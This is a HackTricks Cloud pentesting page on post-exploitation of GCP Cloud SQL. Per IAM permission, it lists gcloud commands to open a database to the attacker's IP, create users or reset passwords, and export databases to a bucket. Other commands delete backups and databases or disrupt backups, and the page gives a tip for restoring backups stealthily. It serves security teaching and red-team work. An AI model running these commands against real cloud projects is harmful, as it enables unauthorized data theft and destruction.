hacktricks-cloud/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md

# GCP - Cloud SQL Post Exploitation

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}

## Cloud SQL

For more information about Cloud SQL check:

{% content-ref url="../gcp-services/gcp-cloud-sql-enum.md" %}
[gcp-cloud-sql-enum.md](../gcp-services/gcp-cloud-sql-enum.md)
{% endcontent-ref %}

### `cloudsql.instances.update`, ( `cloudsql.instances.get`)

To connect to the databases you **just need access to the database port** and know the **username** and **password**, there isn't any IAM requirements. So, an easy way to get access, supposing that the database has a public IP address, is to update the allowed networks and **allow your own IP address to access it**.

```bash
# Use --assign-ip to make the database get a public IPv4
gcloud sql instances patch $INSTANCE_NAME \
    --authorized-networks "$(curl ifconfig.me)" \
    --assign-ip \
    --quiet

mysql -h <ip_db> # If mysql

# With cloudsql.instances.get you can use gcloud directly
gcloud sql connect mysql --user=root --quiet
```

It's also possible to use **`--no-backup`** to **disrupt the backups** of the database.

As these are the requirements I'm not completely sure what are the permissions **`cloudsql.instances.connect`** and **`cloudsql.instances.login`** for. If you know it send a PR!

### `cloudsql.users.list`

Get a **list of all the users** of the database:

```bash
gcloud sql users list --instance <intance-name>
```

### `cloudsql.users.create`

This permission allows to **create a new user inside** the database:

```bash
gcloud sql users create <username> --instance <instance-name> --password <password>
```

### `cloudsql.users.update`

This permission allows to **update user inside** the database. For example, you could change its password:

{% code overflow="wrap" %}
```bash
gcloud sql users set-password <username> --instance <instance-name> --password <password>
```
{% endcode %}

### `cloudsql.instances.restoreBackup`, `cloudsql.backupRuns.get`

Backups might contain **old sensitive information**, so it's interesting to check them.\
**Restore a backup** inside a database:

```bash
gcloud sql backups restore <backup-id> --restore-instance <instance-id>
```

To do it in a more stealth way it's recommended to create a new SQL instance and recover the data there instead of in the currently running databases.

### `cloudsql.backupRuns.delete`

This permission allow to delete backups:

```bash
gcloud sql backups delete <backup-id> --instance <instance-id>
```

### `cloudsql.instances.export`, `storage.objects.create`

**Export a database** to a Cloud Storage Bucket so you can access it from there:

```bash
# Export sql format, it could also be csv and bak
gcloud sql export sql <instance-id> <gs://bucketName/fileName> --database <db>
```

### `cloudsql.instances.import`, `storage.objects.get`

**Import a database** (overwrite) from a Cloud Storage Bucket:

```bash
# Import format SQL, you could also import formats bak and csv
gcloud sql import sql <instance-id> <gs://bucketName/fileName>
```

### `cloudsql.databases.delete`

Delete a database from the db instance:

```bash
gcloud sql databases delete <db-name> --instance <instance-id>
```

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}